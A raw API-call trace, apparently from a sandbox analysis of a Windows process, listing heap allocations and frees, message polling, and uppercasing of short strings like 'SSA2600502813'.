PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0207.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0207.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0207.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0207.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0207.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11605) returned 0x2aae878 [0207.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0207.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0207.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0207.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0207.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0207.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0207.942] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0207.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0207.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0207.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0207.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0207.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0207.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0207.942] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0207.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0207.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0207.942] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0207.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0207.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0207.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0207.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722d8 [0207.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0207.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0207.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0207.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0207.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11605) returned 0x2aae878 [0207.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0207.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72328 [0207.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0207.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0207.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0207.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72368 [0207.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0207.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0207.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0207.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72348 [0207.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0207.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0207.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0207.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa960 [0207.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0207.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0207.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0207.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0207.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0207.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0207.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0207.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11605) returned 0x37c0048 [0207.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0207.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0207.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0207.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0207.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0207.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0207.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0207.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0207.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0207.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0207.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0207.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0207.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0207.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0207.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0207.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0207.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0207.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0207.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0207.977] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0207.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0207.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0207.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0207.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0207.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0207.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0207.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0207.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0207.977] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0207.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0207.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0207.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0207.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0207.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0207.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0207.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0207.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0207.977] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0207.978] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0207.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0207.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0207.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0207.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0207.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0207.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0207.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0207.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0207.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0207.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0207.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0207.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0207.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0207.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0207.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0207.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0207.978] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0207.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0207.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0207.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0207.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0207.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0207.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0207.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0207.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0207.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0207.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0207.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0207.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0207.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0207.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0207.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0207.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0207.979] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0207.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0207.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0207.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0207.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0207.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0207.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0207.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0207.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0207.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0207.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0207.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0207.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0207.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0207.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0207.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0207.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0207.980] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0207.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0207.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0207.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0207.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0207.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0207.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0207.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0207.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad08 [0207.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0207.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0207.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0207.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad50 [0207.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacf0 [0207.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0207.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0207.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0207.980] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0207.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0207.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0207.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0207.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0207.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadb0 [0207.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0207.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0207.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac60 [0207.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0207.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac60 | out: hHeap=0x2af0000) returned 1 [0207.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0207.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac78 [0207.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae10 [0207.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0207.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0207.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0207.981] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0207.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0207.981] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0207.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0207.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0207.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa978 [0207.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0207.981] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0207.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0207.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab40 [0207.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad80 [0207.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0207.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac30 [0207.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0207.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0207.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0207.981] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0207.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0207.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0207.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0207.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0207.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab40 | out: hHeap=0x2af0000) returned 1 [0207.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0207.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0207.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0207.982] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0207.982] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0207.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0207.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0207.982] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0207.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0207.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0207.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaac00 [0207.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73980 [0207.982] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0207.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0207.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0207.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae28 [0207.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad98 [0207.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0207.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaade0 [0207.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0207.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0207.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0207.983] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0207.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0207.983] 